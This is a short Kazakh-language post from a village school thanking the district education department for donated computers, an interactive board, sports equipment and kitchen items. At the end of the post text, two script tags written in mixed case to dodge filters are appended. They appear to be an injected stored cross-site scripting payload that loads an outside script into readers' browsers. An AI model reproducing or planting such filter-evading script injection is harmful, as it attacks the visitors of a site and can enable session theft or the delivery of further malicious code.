Жалтыр ауылының №3 жалпы орта білім беретін мектебі» КММ материалдық және техникалық қолдау көрсеткені үшін «Астрахан аудандық білім бөлімі» ММ-не алғыс білдіреміз. «Астрахан аудандық білім бөлімі»ММ мектептің техникалық базасын нығайту үшін 2023-2024 оқу жылында модем, принтер, интерактивті тақта, компьютер берсе, оқушылардың тәрбиелік іс-шаралардың өтілуіне қолдау ретінде музыкалық аппаратура, ал спорттық шараларға қатысу үшін шаңғы, доп, доп үрлейтін насос т.б спорттық жабдықтар алып берді. Сонымен қатар мектептің асханасын жабдықтау барысында сушилка, раковина, ыдыс- аяқтар алып берді. Оқушылардың заманауи білім алуына ықпал жасап, жан-жақты дамуы қолайлы жағдай жасады. Қолдау мен қамқорлық үшін «Астрахан аудандық білім бөлімі»ММ-не алғыс білдіре отырып, жұмыстарына табыс, алар асулары биік болсын демекпіз. Ауыл мектебін қолдауы - біз үшін үлкен мәртебе.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

24.12.2024
Просмотров: 9225


Пікір қосу



Деректерді қолтаңбаға қосу